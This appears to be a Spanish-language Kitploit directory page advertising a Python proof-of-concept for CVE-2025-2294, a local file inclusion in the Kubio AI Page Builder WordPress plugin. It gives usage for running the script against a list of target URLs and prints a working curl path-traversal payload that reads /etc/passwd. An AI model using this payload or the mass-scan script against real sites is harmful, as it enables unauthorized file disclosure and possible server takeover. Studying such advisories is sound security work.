Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2294 — PoC en Python para CVE-2025-2294, una inclusión local de archivos no autenticada en el plugin de WordPress Kubio AI Page Builder (≤2.5.1), que demuestra divulgación arbitraria de archivos y posible ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/0xwhoami35/cve-2025-2294
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHub0xwhoami35/cve-2025-2294

CVE-2025-2294

PoC en Python para CVE-2025-2294, una inclusión local de archivos no autenticada en el plugin de WordPress Kubio AI Page Builder (≤2.5.1), que demuestra divulgación arbitraria de archivos y posible ejecución remota de código.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-2294

🚨 CVE-2025-2294 - Vulnerabilidad de Inclusión de Archivos Locales (LFI) en Kubio AI Page Builder para WordPress 🧱

🔍 Resumen

CVE-2025-2294 es una vulnerabilidad crítica 🔥 de Inclusión de Archivos Locales (LFI) que afecta al plugin Kubio AI Page Builder para WordPress (versiones hasta la 2.5.1 inclusive). Este fallo permite a atacantes remotos no autenticados 👾 incluir archivos arbitrarios en el servidor a través del parámetro de URL __kubio-site-edit-iframe-classic-template.

La explotación de esta vulnerabilidad puede dar lugar a la divulgación de archivos sensibles 📂, ejecución remota de código 💥 y compromiso total del sistema 💀.

👤 Autor

Muhammad Nizar — Investigador de Seguridad 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️


¡No dudes en contactarme para preguntas o colaboración! 🤝


📋 Versiones Afectadas

  • Plugin Kubio AI Page Builder ≤ 2.5.1 🛠️

🧰 Uso

Ejecuta el script de explotación con una lista de URLs objetivo:

root@kitploit:~
python3 lfi.py -l list.txt

⚠️ Detalles de la Vulnerabilidad

  • Tipo: Inclusión de Archivos Locales (LFI) 🕳️
  • Gravedad: Crítica (CVSS 9.8) 🔥
  • Vector de Ataque: Remoto, no autenticado 🌐
  • Impacto: Confidencialidad, Integridad, Disponibilidad 🔐

🧪 Prueba de Concepto (PoC)

root@kitploit:~
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
Descargar herramienta